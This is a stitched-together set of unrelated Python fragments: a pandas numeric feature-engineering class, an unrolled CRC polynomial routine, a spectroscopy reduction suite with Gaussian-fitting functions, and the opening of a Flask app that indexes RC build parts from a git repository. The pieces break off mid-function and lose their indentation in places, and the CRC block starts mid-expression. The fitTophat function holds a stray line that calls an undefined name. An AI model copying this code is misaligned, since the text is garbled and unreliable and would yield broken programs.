            num_columns.append(key)
        else:
            cate_columns.append(key)
            # Normalize every category column to the 'object' dtype.
            data[key] = data[key].astype('object')
    return num_columns, cate_columns
class NumericFeatureEngineer(object):
"""The class for numeric feature engineering.
"""
def __init__(self, num_columns):
    """Initialize class with given parameters.

    :param num_columns: List. The list consists of numeric column names.
    """
    self.num_columns = num_columns
    # Fitted distribution transformer (or None) per numeric column.
    self.num_transform_dic = {}
    # NA filler fitted on train data.
    self.num_na_filler = None
@staticmethod
def check_normal_distribution(data):
    """Test whether the data follows a normal distribution.

    Runs a Shapiro-Wilk normality test on the given values.

    :param data: Dataframe. One column dataframe, waited to be tested.
    :return:
        stat: The Shapiro-Wilk test statistic.
        p: P-value; small values reject the normality hypothesis.
    """
    # normality test
    statistic, p_value = shapiro(data)
    return statistic, p_value
def fit_transform(self, dataset):
    """Feature engineering for numeric columns.

    Conduct feature engineering to numeric columns.
    Including several kind of methods, as followings:
    1. Detect non-normal columns and transform them toward a normal
       distribution (Box-Cox / Yeo-Johnson / quantile transform).
    2. Round to 3 decimal places.
    3. Fill NA with mean.

    NOTE: this module uses Python 2 print statements.

    :param dataset: Dataframe. The input dataframe.
    :return: Dataframe. The output dataframe with converted numeric columns.
    """
    # Work on a copy so the caller's dataframe is left untouched.
    data = dataset.copy()
    for column in self.num_columns:
        print column
        # Normality test (Shapiro-Wilk via the static helper above).
        stat, p = self.check_normal_distribution(data[column])
        print(column, ': Statistics=%.3f, p=%.3f' % (stat, p)),
        # When p-value is under 0.05, it means the distribution is different to normal distribution.
        alpha = 0.05  # Set cutoff to reject the Null hypothesis.
        if p < alpha:
            print('Sample does not look Gaussian (reject H0)'),
            # Calculate skewness of distribution.
            # NOTE(review): `skewness` and `outlier_index` are computed
            # but never used below.
            skewness = data[column].skew(axis=0)
            # Check whether there are outliers or not.
            outlier_detector = dc.OutlierDetector(data, [], [])
            outlier_index = outlier_detector.mean_detection(data[column])
            # todo check outlier function.
            # NOTE(review): `if True:` deliberately disables the outlier
            # branch; the quantile-transform else-branch below is
            # currently unreachable.
            if True:
                # Check whether there are negative values.
                print '\nThere is no outlier.'
                if sum(data[column] < 0) == 0:
                    # If there is none of negative values, apply Box-cox transformation.
                    power_transformer = PowerTransformer(method='box-cox')
                    # NOTE(review): Series.reshape was removed in modern
                    # pandas; this assumes an old pandas version.
                    data[column] = power_transformer.fit_transform(data[column].reshape(-1, 1))
                else:
                    # If there are some negative values, apply yeo-johnson method.
                    power_transformer = PowerTransformer(method='yeo-johnson')
                    data[column] = power_transformer.fit_transform(data[column].reshape(-1, 1))
                # Store power transformer into dictionary.
                self.num_transform_dic[column] = power_transformer
            else:
                # If there are some outliers, apply quantile transformer to normal distribution.
                quantile_transformer = QuantileTransformer(output_distribution='normal', random_state=1021)
                data[column] = quantile_transformer.fit_transform(data[column].reshape(-1, 1))
                # Store quantile transformer into dictionary.
                self.num_transform_dic[column] = quantile_transformer
        else:
            print('Sample looks Gaussian (fail to reject H0)')
            # If the column is normal distribution, assign 'None' to transformer dictionary.
            self.num_transform_dic[column] = None
    # Round the number into .3float, to lower running time.
    data = data.round(3)
    # Fill None with 'mean' for numerical columns.
    na_filler = dc.NaFiller()
    data = na_filler.fit_transform(data, self.num_columns)
    # Store imputer into dictionary.
    self.num_na_filler = na_filler
    return data
def transform(self, data):
"""Transform numeric column, especially for test data.
Apply same method in fit_transform() function to transform target dataframe.
:param data: Dataframe. The target Pandas dataframe to be transformed.
:return: Dataframe. The processed dataframe.
"""
# Convert numerical columns whose distributions are not normal to normal distribution.
for column in | |
^ q(31) ^ d(1) ^ d(5) ^ d(6) ^ d(9) ^ d(13) ^ d(14) ^ d(18) ^ d(20) ^ d(22) ^ d(23),
q(10) ^ q(14) ^ q(15) ^ q(18) ^ q(22) ^ q(23) ^ q(27) ^ q(29) ^ q(31) ^ d(2) ^ d(6) ^ d(7) ^ d(10) ^ d(14) ^ d(15) ^ d(19) ^ d(21) ^ d(23),
q(11) ^ q(15) ^ q(16) ^ q(19) ^ q(23) ^ q(24) ^ q(28) ^ q(30) ^ d(3) ^ d(7) ^ d(8) ^ d(11) ^ d(15) ^ d(16) ^ d(20) ^ d(22),
q(12) ^ q(16) ^ q(17) ^ q(20) ^ q(24) ^ q(25) ^ q(29) ^ q(31) ^ d(4) ^ d(8) ^ d(9) ^ d(12) ^ d(16) ^ d(17) ^ d(21) ^ d(23),
q(13) ^ q(17) ^ q(18) ^ q(21) ^ q(25) ^ q(26) ^ q(30) ^ d(5) ^ d(9) ^ d(10) ^ d(13) ^ d(17) ^ d(18) ^ d(22),
q(8) ^ q(17) ^ q(19) ^ q(20) ^ q(22) ^ q(24) ^ q(26) ^ q(27) ^ q(31) ^ d(0) ^ d(9) ^ d(11) ^ d(12) ^ d(14) ^ d(16) ^ d(18) ^ d(19) ^ d(23),
q(8) ^ q(9) ^ q(14) ^ q(17) ^ q(21) ^ q(23) ^ q(24) ^ q(25) ^ q(27) ^ q(28) ^ d(0) ^ d(1) ^ d(6) ^ d(9) ^ d(13) ^ d(15) ^ d(16) ^ d(17) ^ d(19) ^ d(20),
q(0) ^ q(9) ^ q(10) ^ q(15) ^ q(18) ^ q(22) ^ q(24) ^ q(25) ^ q(26) ^ q(28) ^ q(29) ^ d(1) ^ d(2) ^ d(7) ^ d(10) ^ d(14) ^ d(16) ^ d(17) ^ d(18) ^ d(20) ^ d(21),
q(1) ^ q(10) ^ q(11) ^ q(16) ^ q(19) ^ q(23) ^ q(25) ^ q(26) ^ q(27) ^ q(29) ^ q(30) ^ d(2) ^ d(3) ^ d(8) ^ d(11) ^ d(15) ^ d(17) ^ d(18) ^ d(19) ^ d(21) ^ d(22),
q(2) ^ q(8) ^ q(11) ^ q(12) ^ q(14) ^ q(18) ^ q(26) ^ q(27) ^ q(28) ^ q(30) ^ q(31) ^ d(0) ^ d(3) ^ d(4) ^ d(6) ^ d(10) ^ d(18) ^ d(19) ^ d(20) ^ d(22) ^ d(23),
q(3) ^ q(9) ^ q(12) ^ q(13) ^ q(15) ^ q(19) ^ q(27) ^ q(28) ^ q(29) ^ q(31) ^ d(1) ^ d(4) ^ d(5) ^ d(7) ^ d(11) ^ d(19) ^ d(20) ^ d(21) ^ d(23),
q(4) ^ q(10) ^ q(13) ^ q(14) ^ q(16) ^ q(20) ^ q(28) ^ q(29) ^ q(30) ^ d(2) ^ d(5) ^ d(6) ^ d(8) ^ d(12) ^ d(20) ^ d(21) ^ d(22),
q(5) ^ q(11) ^ q(14) ^ q(15) ^ q(17) ^ q(21) ^ q(29) ^ q(30) ^ q(31) ^ d(3) ^ d(6) ^ d(7) ^ d(9) ^ d(13) ^ d(21) ^ d(22) ^ d(23),
q(6) ^ q(12) ^ q(15) ^ q(16) ^ q(18) ^ q(22) ^ q(30) ^ q(31) ^ d(4) ^ d(7) ^ d(8) ^ d(10) ^ d(14) ^ d(22) ^ d(23),
q(7) ^ q(13) ^ q(16) ^ q(17) ^ q(19) ^ q(23) ^ q(31) ^ d(5) ^ d(8) ^ d(9) ^ d(11) ^ d(15) ^ d(23),
)
def _generate_next_2B_crc(self, current_crc, data_in):
""" Generates the next round of our CRC; given a 2B trailing input word . """
# Helper functions that help us more clearly match the expanded polynomial form.
d = lambda i : data_in[len(data_in) - i - 1]
q = lambda i : current_crc[i]
# These lines are extremely long, but there doesn't seem any advantage in clarity to splitting them.
return Cat(
q(16) ^ q(22) ^ q(25) ^ q(26) ^ q(28) ^ d(0) ^ d(6) ^ d(9) ^ d(10) ^ d(12),
q(16) ^ q(17) ^ q(22) ^ q(23) ^ q(25) ^ q(27) ^ q(28) ^ q(29) ^ d(0) ^ d(1) ^ d(6) ^ d(7) ^ d(9) ^ d(11) ^ d(12) ^ d(13),
q(16) ^ q(17) ^ q(18) ^ q(22) ^ q(23) ^ q(24) ^ q(25) ^ q(29) ^ q(30) ^ d(0) ^ d(1) ^ d(2) ^ d(6) ^ d(7) ^ d(8) ^ d(9) ^ d(13) ^ d(14),
q(17) ^ q(18) ^ q(19) ^ q(23) ^ q(24) ^ q(25) ^ q(26) ^ q(30) ^ q(31) ^ d(1) ^ d(2) ^ d(3) ^ d(7) ^ d(8) ^ d(9) ^ d(10) ^ d(14) ^ d(15),
q(16) ^ q(18) ^ q(19) ^ q(20) ^ q(22) ^ q(24) ^ q(27) ^ q(28) ^ q(31) ^ d(0) ^ d(2) ^ d(3) ^ d(4) ^ d(6) ^ d(8) ^ d(11) ^ d(12) ^ d(15),
q(16) ^ q(17) ^ q(19) ^ q(20) ^ q(21) ^ q(22) ^ q(23) ^ q(26) ^ q(29) ^ d(0) ^ d(1) ^ d(3) ^ d(4) ^ d(5) ^ d(6) ^ d(7) ^ d(10) ^ d(13),
q(17) ^ q(18) ^ q(20) ^ q(21) ^ q(22) ^ q(23) ^ q(24) ^ q(27) ^ q(30) ^ d(1) ^ d(2) ^ d(4) ^ d(5) ^ d(6) ^ d(7) ^ d(8) ^ d(11) ^ d(14),
q(16) ^ q(18) ^ q(19) ^ q(21) ^ q(23) ^ q(24) ^ q(26) ^ q(31) ^ d(0) ^ d(2) ^ d(3) ^ d(5) ^ d(7) ^ d(8) ^ d(10) ^ d(15),
q(16) ^ q(17) ^ q(19) ^ q(20) ^ q(24) ^ q(26) ^ q(27) ^ q(28) ^ d(0) ^ d(1) ^ d(3) ^ d(4) ^ d(8) ^ d(10) ^ d(11) ^ d(12),
q(17) ^ q(18) ^ q(20) ^ q(21) ^ q(25) ^ q(27) ^ q(28) ^ q(29) ^ d(1) ^ d(2) ^ d(4) ^ d(5) ^ d(9) ^ d(11) ^ d(12) ^ d(13),
q(16) ^ q(18) ^ q(19) ^ q(21) ^ q(25) ^ q(29) ^ q(30) ^ d(0) ^ d(2) ^ d(3) ^ d(5) ^ d(9) ^ d(13) ^ d(14),
q(16) ^ q(17) ^ q(19) ^ q(20) ^ q(25) ^ q(28) ^ q(30) ^ q(31) ^ d(0) ^ d(1) ^ d(3) ^ d(4) ^ d(9) ^ d(12) ^ d(14) ^ d(15),
q(16) ^ q(17) ^ q(18) ^ q(20) ^ q(21) ^ q(22) ^ q(25) ^ q(28) ^ q(29) ^ q(31) ^ d(0) ^ d(1) ^ d(2) ^ d(4) ^ d(5) ^ d(6) ^ d(9) ^ d(12) ^ d(13) ^ d(15),
q(17) ^ q(18) ^ q(19) ^ q(21) ^ q(22) ^ q(23) ^ q(26) ^ q(29) ^ q(30) ^ d(1) ^ d(2) ^ d(3) ^ d(5) ^ d(6) ^ d(7) ^ d(10) ^ d(13) ^ d(14),
q(18) ^ q(19) ^ q(20) ^ q(22) ^ q(23) ^ q(24) ^ q(27) ^ q(30) ^ q(31) ^ d(2) ^ d(3) ^ d(4) ^ d(6) ^ d(7) ^ d(8) ^ d(11) ^ d(14) ^ d(15),
q(19) ^ q(20) ^ q(21) ^ q(23) ^ q(24) ^ q(25) ^ q(28) ^ q(31) ^ d(3) ^ d(4) ^ d(5) ^ d(7) ^ d(8) ^ d(9) ^ d(12) ^ d(15),
q(0) ^ q(16) ^ q(20) ^ q(21) ^ q(24) ^ q(28) ^ q(29) ^ d(0) ^ d(4) ^ d(5) ^ d(8) ^ d(12) ^ d(13),
q(1) ^ q(17) ^ q(21) ^ q(22) ^ q(25) ^ q(29) ^ q(30) ^ d(1) ^ d(5) ^ d(6) ^ d(9) ^ d(13) ^ d(14),
q(2) ^ q(18) ^ q(22) ^ q(23) ^ q(26) ^ q(30) ^ q(31) ^ d(2) ^ d(6) ^ d(7) ^ d(10) ^ d(14) ^ d(15),
q(3) ^ q(19) ^ q(23) ^ q(24) ^ q(27) ^ q(31) ^ d(3) ^ d(7) ^ d(8) ^ d(11) ^ d(15),
q(4) ^ q(20) ^ q(24) ^ q(25) ^ q(28) ^ d(4) ^ d(8) ^ d(9) ^ d(12),
q(5) ^ q(21) ^ q(25) ^ q(26) ^ q(29) ^ d(5) ^ d(9) ^ d(10) ^ d(13),
q(6) ^ q(16) ^ q(25) ^ q(27) ^ q(28) ^ q(30) ^ d(0) ^ d(9) ^ d(11) ^ d(12) ^ d(14),
q(7) ^ q(16) ^ q(17) ^ q(22) ^ q(25) ^ q(29) ^ q(31) ^ d(0) ^ d(1) ^ d(6) ^ d(9) ^ d(13) ^ d(15),
q(8) ^ q(17) ^ q(18) ^ q(23) ^ q(26) ^ q(30) ^ d(1) ^ d(2) ^ d(7) ^ d(10) | |
"""
Suite to reduce spectroscopic data.
subfunctions:
calibrate
setheaders -- exptime, gain, readnoise, etc.
makeflat -- make median flat and noisy pixel map
makedark -- make median dark, and estimate noise in each pixel.
clean -- clean and replace bad pixels
extract
trace -- trace spectral orders
makeprofile -- compute mean spectral PSF (a spline) for an order
fitprofile -- fit given spline-PSF to a spectral cross-section
Utilities:
pickloc
fitPSF
"""
# 2010-07-02 10:56 IJC: Began the great endeavor.
try:
from astropy.io import fits as pyfits
except:
import pyfits
import matplotlib.pyplot as plt
import numpy as np
from scipy import optimize, interpolate
import pdb
class baseObject:
    """Empty object container.

    Instances serve as plain attribute bags; callers attach whatever
    attributes they need after construction.
    """
    def __init__(self):
        pass
########
# Utilities to add in a separate cohesive package at a later date:
from analysis import polyfitr, stdr, binarray, gaussian, egaussian
import analysis as an
from nsdata import bfixpix
########
# Parameters to put in a GUI:
gain = 5 # e-/ADU
readnoise = 25 # e-
#########
def message(text):
    """Display a message; for now, by printing it to stdout and flushing.

    :param text: The message to display.
    """
    from sys import stdout
    # FIX: parenthesized single-argument print works under both
    # Python 2 and Python 3; the original bare `print text` statement
    # is a syntax error on Python 3.
    print(text)
    stdout.flush()
def pickloc(ax=None, zoom=10):
    """Interactively pick a location in a matplotlib axes.

    Blocks on mouse input: the user clicks a candidate point, the view
    zooms in around it, and a second click confirms the choice (an
    empty response — Enter/Return — restarts the selection instead).

    :INPUTS:
    ax : (axes instance) -- axes in which to pick a location
    zoom : int -- zoom radius for target confirmation
         : 2-tuple -- (x,y) radii for zoom confirmation.

    :RETURNS:
    loc : 2-tuple -- the confirmed (x, y) location.
    """
    # 2011-04-29 19:26 IJC:
    # 2011-09-03 20:59 IJMC: Zoom can now be a tuple; x,y not cast as int.
    pickedloc = False
    if ax is None:
        ax = plt.gca()
    # Remember the full view so it can be restored for each attempt.
    axlimits = ax.axis()
    # Accept either a scalar zoom radius or separate (x, y) radii.
    if hasattr(zoom, '__iter__') and len(zoom)>1:
        xzoom, yzoom = zoom
    else:
        xzoom = zoom
        yzoom = zoom
    while not pickedloc:
        ax.set_title("click to select location")
        ax.axis(axlimits)
        x = None
        # Loop until the user actually clicks somewhere.
        while x is None:
            selectevent = plt.ginput(n=1,show_clicks=False)
            if len(selectevent)>0: # Prevent user from cancelling out.
                x,y = selectevent[0]
        #x = x.astype(int)
        #y = y.astype(int)
        # Zoom in around the candidate point for confirmation.
        if zoom is not None:
            ax.axis([x-xzoom,x+xzoom,y-yzoom,y+yzoom])
        ax.set_title("you selected xy=(%i,%i)\nclick again to confirm, or press Enter/Return to try again" %(x,y) )
        plt.draw()
        # A second click confirms; an empty response retries.
        confirmevent = plt.ginput(n=1,show_clicks=False)
        if len(confirmevent)>0:
            pickedloc = True
            loc = confirmevent[0]
    return loc
def fitTophat(vec, err=None, verbose=False, guess=None):
"""Fit a 1D tophat function to an input data vector.
Return the fit, and uncertainty estimates on that fit.
SEE ALSO: :func:`analysis.gaussian`"""
xtemp = np.arange(1.0*len(vec))
if guess is None: # Make some educated guesses as to the parameters:
pedestal = 0.5 * (0.8*np.median(vec) + 0.2*(vec[0]+vec[1]))
area = (vec-pedestal).sum()
centroid = (vec*xtemp).sum()/vec.sum()
if centroid<0:
centroid = 1.
elif centroid>len(vec):
centroid = len(vec)-2.
sigma = area/vec[int(centroid)]/np.sqrt(2*np.pi)
if sigma<=0:
sigma = 0.01
guess = [area,sigma,centroid,pedestal]
if verbose:
print 'Gaussian guess parameters>>', guess
if err is None:
fit, fitcov = optimize.leastsq(egaussian, guess, args=(xtemp, vec), full_output=True)[0:2]
pc.resfunc
fit, fitcov = optimize.leastsq(egaussian, guess, args=(xtemp, vec), full_output=True)[0:2]
else:
fit, fitcov = optimize.leastsq(egaussian, guess, args=(xtemp, vec, err), full_output=True)[0:2]
if fitcov is None: # The fitting was really bad!
fiterr = np.abs(fit)
else:
fiterr = np.sqrt(np.diag(fitcov))
if verbose:
print 'Best-fit parameters>>', fit
f = plt.figure()
ax = plt.axes()
plt.plot(xtemp, vec, 'o', \
xtemp, gaussian(fit, xtemp), '-', \
xtemp, gaussian(guess, xtemp), '--')
return fit, fiterr
def fitGaussian(vec, err=None, verbose=False, guess=None):
"""Fit a Gaussian function to an input data vector.
Return the fit, and uncertainty estimates on that fit.
SEE ALSO: :func:`analysis.gaussian`"""
# 2012-12-20 13:28 IJMC: Make a more robust guess for the centroid.
xtemp = np.arange(1.0*len(vec))
if guess is None: # Make some educated guesses as to the parameters:
pedestal = (0.8*np.median(vec) + 0.2*(vec[0]+vec[1]))
area = (vec-pedestal).sum()
centroid = ((vec-pedestal)**2*xtemp).sum()/((vec-pedestal)**2).sum()
if centroid<0:
centroid = 1.
elif centroid>len(vec):
centroid = len(vec)-2.
#pdb.set_trace()
sigma = area/vec[int(centroid)]/np.sqrt(2*np.pi)
if sigma<=0:
sigma = .01
guess = [area,sigma,centroid,pedestal]
if err is None:
err = np.ones(vec.shape, dtype=float)
badvals = True - (np.isfinite(xtemp) * np.isfinite(err) * np.isfinite(vec))
vec[badvals] = np.median(vec[True - badvals])
err[badvals] = vec[True - badvals].max() * 1e9
if verbose:
print 'Gaussian guess parameters>>', guess
if not np.isfinite(xtemp).all():
pdb.set_trace()
if not np.isfinite(vec).all():
pdb.set_trace()
if not np.isfinite(err).all():
pdb.set_trace()
try:
fit, fitcov = optimize.leastsq(egaussian, guess, args=(xtemp, vec, err), full_output=True)[0:2]
except:
pdb.set_trace()
if fitcov is None: # The fitting was really bad!
fiterr = np.abs(fit)
else:
fiterr = np.sqrt(np.diag(fitcov))
#pdb.set_trace()
if verbose:
print 'Best-fit parameters>>', fit
f = plt.figure()
ax = plt.axes()
plt.plot(xtemp, vec, 'o', \
xtemp, gaussian(fit, xtemp), '-', \
xtemp, gaussian(guess, xtemp), '--')
return fit, fiterr
def fitGaussiann(vec, err=None, verbose=False, guess=None, holdfixed=None):
"""Fit a Gaussian function to an input data vector.
Return the fit, and uncertainty estimates on that fit.
SEE ALSO: :func:`analysis.gaussian`"""
from phasecurves import errfunc
from analysis import fmin
xtemp = np.arange(1.0*len(vec))
if guess is None: # Make some educated guesses as to the parameters:
holdfixed = None
pedestal = 0.5 * (0.8*np.median(vec) + 0.2*(vec[0]+vec[1]))
area = (vec-pedestal).sum()
centroid = (vec*xtemp).sum()/vec.sum()
if centroid<0:
centroid = 1.
elif centroid>len(vec):
centroid = len(vec)-2.
sigma = area/vec[int(centroid)]/np.sqrt(2*np.pi)
if sigma<=0:
sigma = 0.01
guess = [area,sigma,centroid,pedestal]
if err is None:
err = np.ones(vec.shape, dtype=float)
badvals = True - (np.isfinite(xtemp) * np.isfinite(err) * np.isfinite(vec))
vec[badvals] = np.median(vec[True - badvals])
err[badvals] = vec[True - badvals].max() * 1e9
if verbose:
print 'Gaussian guess parameters>>', guess
if not np.isfinite(xtemp).all():
pdb.set_trace()
if not np.isfinite(vec).all():
pdb.set_trace()
if not np.isfinite(err).all():
pdb.set_trace()
try:
#fit, fitcov = optimize.leastsq(egaussian, guess, args=(xtemp, vec, err), full_output=True)[0:2]
fitargs = (gaussian, xtemp, vec, 1./err**2)
fit = fmin(errfunc, guess, args=fitargs, full_output=True, disp=False, holdfixed=holdfixed)[0]
fitcov = None
except:
pdb.set_trace()
if fitcov is None: # The fitting was really bad!
fiterr = np.abs(fit)
else:
fiterr = np.sqrt(np.diag(fitcov))
if verbose:
print 'Best-fit parameters>>', fit
f = plt.figure()
ax = plt.axes()
plt.plot(xtemp, vec, 'o', \
xtemp, gaussian(fit, xtemp), '-', \
xtemp, gaussian(guess, xtemp), '--')
return fit, fiterr
def fit2Gaussian(vec, err=None, verbose=False, guess=None, holdfixed=None):
    """Fit two Gaussians simultaneously to an input data vector.

    :INPUTS:
      vec : sequence
        1D array or list of values to fit to
      err : sequence
        uncertainties on vec (defaults to unit weights)
      guess : sequence
        guess parameters: [area1, sigma1, cen1, area2, sig2, cen2, constant].
        Note that parameters are in pixel units.  When None, `holdfixed`
        is ignored (reset to None) and a symmetric two-bump guess is built.
      holdfixed : sequence
        parameters to hold fixed in analysis, _IF_ guess is passed in.

    :RETURNS:
      best-fit parameter vector (fmin's first output).

    SEE ALSO: :func:`analysis.gaussian`, :func:`fitGaussian`"""
    # 2012-03-14 14:33 IJMC: Created
    from tools import sumfunc
    from phasecurves import errfunc
    from analysis import fmin # Don't use SciPy, because I want keywords!
    xtemp = np.arange(1.0*len(vec))
    if err is None:
        err = np.ones(xtemp.shape)
    else:
        err = np.array(err, copy=False)
    if guess is None: # Make some semi-educated guesses as to the parameters:
        holdfixed = None
        pedestal = 0.5 * (0.8*np.median(vec) + 0.2*(vec[0]+vec[1]))
        area = (vec-pedestal).sum()
        centroid = (vec*xtemp).sum()/vec.sum()
        # Clamp a wild centroid guess back inside the vector.
        if centroid<0:
            centroid = 1.
        elif centroid>len(vec):
            centroid = len(vec)-2.
        sigma = area/vec[int(centroid)]/np.sqrt(2*np.pi)
        if sigma<=0:
            sigma = 0.01
        # Split the single-Gaussian guess into two bumps straddling the centroid.
        guess1 = [area/2.,sigma/1.4,centroid+xtemp.size/5.]
        guess2 = [area/2.,sigma/1.4,centroid-xtemp.size/5.]
        guess = guess1 + guess2 + [pedestal]
    ## Testing:
    #mod = sumfunc(guess, gaussian, gaussian, 3, 4, args1=(xtemp,), args2=(xtemp,))
    #fitargs = (sumfunc, gaussian, gaussian, 3, 4, (xtemp,), (xtemp,), None, vec, 1./err**2)
    #fitkw = dict(useindepvar=False, testfinite=False)
    #chisq = errfunc(guess, *fitargs, **fitkw)
    #thisfit = fmin(errfunc, guess, args=fitargs, kw=fitkw, full_output=True)
    #mod2 = sumfunc(thisfit[0], gaussian, gaussian, 3, 4, args1=(xtemp,), args2=(xtemp,))
    if verbose:
        print '2-Gaussian guess parameters>>', guess
    # sumfunc evaluates gaussian(params[0:3]) + gaussian(params[3:7]);
    # weights are inverse variance.
    fitargs = (sumfunc, gaussian, gaussian, 3, 4, (xtemp,), (xtemp,), vec, 1./err**2)
    fitkw = dict(useindepvar=False, testfinite=False)
    fit = fmin(errfunc, guess, args=fitargs, kw=fitkw, full_output=True, disp=False, holdfixed=holdfixed)
    if verbose:
        model = sumfunc(fit[0], gaussian, gaussian, 3, 4, args1=(xtemp,), args2=(xtemp,))
        model1 = gaussian(fit[0][0:3], xtemp)
        model2 = gaussian(fit[0][3:6], xtemp)
        print 'Best-fit parameters>>', fit[0]
        f = plt.figure()
        ax = plt.axes()
        # Data, combined model, then each component offset by the constant term.
        plt.plot(xtemp, vec, 'o', \
            xtemp, model, '--')
        plt.plot(xtemp, model1+fit[0][6], ':')
        plt.plot(xtemp, model2+fit[0][6], ':')
    return fit[0]
def fitPSF(ec, guessLoc, fitwidth=20, verbose=False, sigma=5, medwidth=6, err_ec=None):
"""
Helper function to fit 1D PSF near a given region. Assumes
spectrum runs horizontally across the frame!
ec : 2D numpy array
echellogram array, with horizontal dispersion direction
guessLoc : 2-tuple
A slight misnomer for this (x,y) tuple: y is a guess and will
be fit, but x is the coordinate at which the fitting takes
place.
fitwidth : int
width of cross-dispersion direction to use in fitting
medwidth : int
number of columns to average over when fitting a profile
verbose : bool
verbosity/debugging printout flag
sigma : scalar
sigma scale for clipping bad values
"""
# 2010-08-24 22:00 IJC: Added sigma option
# 2010-11-29 20:54 IJC: Added medwidth option
# 2011-11-26 | |
# application.py
# -*- coding: utf-8 -*-
from cryptography.fernet import Fernet
from flask import Flask, render_template, Response, abort, session, request, url_for, flash, redirect
from flask.ext.github import GitHub, GitHubError
from flask_sslify import SSLify
import elasticsearch
import os
import os.path
import pylru
import base64
import copy
import requests
import json
import hmac
import math
import urllib
import urlparse
from hashlib import sha1
import collections
def update(d, u):
    """Recursively merge mapping `u` into dict `d`, in place.

    Nested mappings are merged key-by-key instead of being replaced
    wholesale; non-mapping values in `u` overwrite those in `d`.

    Returns `d` for convenience.
    """
    # collections.Mapping was removed from the top-level module in
    # Python 3.10; prefer collections.abc with a Python-2 fallback.
    try:
        from collections.abc import Mapping as _Mapping
    except ImportError:
        from collections import Mapping as _Mapping
    # .items() works on both Python 2 and 3 (iteritems() does not).
    for k, v in u.items():
        if isinstance(v, _Mapping):
            d[k] = update(d.get(k, {}), v)
        else:
            d[k] = v
    return d
# Init the rcbuild.info app.
rcbuild = Flask(__name__)
# Force HTTPS for everything except the load-balancer health check.
sslify = SSLify(rcbuild, skips=["healthz"])
# GitHub OAuth app credentials/endpoints come from the environment so no
# secrets live in the source tree.
rcbuild.config['GITHUB_CLIENT_ID'] = os.environ['GITHUB_CLIENT_ID']
rcbuild.config['GITHUB_CLIENT_SECRET'] = os.environ['GITHUB_CLIENT_SECRET']
rcbuild.config['GITHUB_BASE_URL'] = os.environ['GITHUB_BASE_URL']
rcbuild.config['GITHUB_AUTH_URL'] = os.environ['GITHUB_AUTH_URL']
rcbuild.config['PROPAGATE_EXCEPTIONS'] = True
# Keep login sessions for one year (value in seconds).
rcbuild.config['PERMANENT_SESSION_LIFETIME'] = 365 * 24 * 60 * 60
rcbuild.secret_key = os.environ['SESSION_SECRET_KEY']
# WSGI entry point alias expected by the hosting platform.
application = rcbuild
# Symmetric key used by the Fernet instance `f` below.
FERNET_KEY = os.environ['FERNET_KEY']
f = Fernet(FERNET_KEY)
es = elasticsearch.Elasticsearch([os.environ['ES_HOST']])
# Commits whose message starts with this prefix do not bump snapshot timestamps
# (see updateBuildIndex).
SILENT_COMMIT_MESSAGE = "Silently upgrade - "
# Placeholders populated elsewhere -- presumably loaded at startup; confirm.
partCategories_string = ""
partCategories = {}
buildSkeleton = {}
infoSkeleton = {}
# Small LRU cache of recent GitHub API responses.
github_cache = pylru.lrucache(64)
from git import Repo
github = GitHub(rcbuild)
# User-Agent substrings identifying social-media link-preview crawlers.
SOCIAL_BOTS = ["facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)",
               "facebookexternalhit/1.1",
               "Mozilla/5.0 (compatible; redditbot/1.0; +http://www.reddit.com/feedback)",
               "Twitterbot",
               "Pinterest",
               "Google (+https://developers.google.com/+/web/snippet/)",
               "Mozilla/5.0 (compatible; Google-Structured-Data-Testing-Tool +http://developers.google.com/structured-data/testing-tool/)"]
def is_social_bot():
    """Return True when the current request's User-Agent contains any
    known social-media crawler signature."""
    agent = request.user_agent.string
    return any(bot in agent for bot in SOCIAL_BOTS)
def CloneOrPull():
    """Ensure a local checkout of the parts repository exists and is
    current: clone it on first use, otherwise pull the remote."""
    if os.path.isdir("parts-repo"):
        repo = Repo("parts-repo")
        repo.remote().pull()
    else:
        repo = Repo.clone_from("https://github.com/rcbuild-info/parts.git", "parts-repo")
# In-memory part indexes, rebuilt wholesale by updatePartIndexHelper():
# manufacturerID -> partID -> small part dict.
SMALL_PARTS_BY_ID = {}
# category -> manufacturerID -> partID -> small part dict.
SMALL_PARTS_BY_CATEGORY = {}
# Symlink aliases: manufacturerID -> partID -> (target manufacturer, target part).
LINKS = {}
def addPart(dest, manufacturerID, partID, part):
    """Insert `part` into the two-level index `dest` keyed by
    manufacturer then part id, creating the manufacturer bucket on demand."""
    dest.setdefault(manufacturerID, {})[partID] = part
def updatePartIndexHelper():
    """Rebuild the in-memory part indexes from the parts git repository.

    Walks the checked-out "parts-repo" tree, loads every part JSON file
    into the by-id and by-category indexes, and records symlink aliases
    in LINKS.  The three module-level indexes are swapped in only after
    the new dicts are fully built, so readers never see a partial index.
    """
    CloneOrPull()
    new_small_parts_by_id = {}
    new_small_parts_by_category = {}
    new_links = {}
    for dirpath, dirnames, filenames in os.walk("parts-repo"):
        manufacturerID = dirpath[len("parts-repo/"):]
        for filename in filenames:
            if not filename.endswith("json"):
                continue
            partID = filename[:-len(".json")]
            full_path = os.path.join(dirpath, filename)
            link = False
            if os.path.islink(full_path):
                link = True
                full_path = os.path.realpath(full_path)
            if not os.path.isfile(full_path):
                continue
            split = full_path.split("/")
            # NOTE(review): realpath() returns an absolute path, so a
            # 2-component split looks unreachable in practice -- confirm.
            if len(split) == 2:
                m = split[-2]
                p = split[-1][:-len(".json")]
                # BUGFIX: `p` already had ".json" stripped above; the old
                # code sliced another len(".json") characters off the part
                # id, corrupting the link target.
                addPart(new_links, manufacturerID, partID, (m, p))
            with open(full_path, "r") as part_file:
                part = json.load(part_file)
            part["id"] = manufacturerID + "/" + partID
            # Keep only the fields the index pages need.
            small_part = {"manufacturer": part["manufacturer"],
                          "name": part["name"]}
            if link:
                small_part["link"] = True
            categories = []
            if "version" in part:
                categories = part["categories"]
            elif part["category"]:
                categories = [part["category"]]
            small_part["categories"] = categories
            for category in categories:
                if category not in new_small_parts_by_category:
                    new_small_parts_by_category[category] = {}
                addPart(new_small_parts_by_category[category], manufacturerID, partID, small_part)
            addPart(new_small_parts_by_id, manufacturerID, partID, small_part)
    global SMALL_PARTS_BY_CATEGORY
    global SMALL_PARTS_BY_ID
    global LINKS
    SMALL_PARTS_BY_CATEGORY = new_small_parts_by_category
    SMALL_PARTS_BY_ID = new_small_parts_by_id
    LINKS = new_links
@rcbuild.route('/update/partIndex', methods=["GET", "HEAD", "OPTIONS", "POST"])
def updatePartIndex():
    """Rebuild the part indexes.

    GET is a manual trigger restricted to one GitHub account; POST is the
    GitHub webhook, authenticated by its HMAC-SHA1 payload signature.
    """
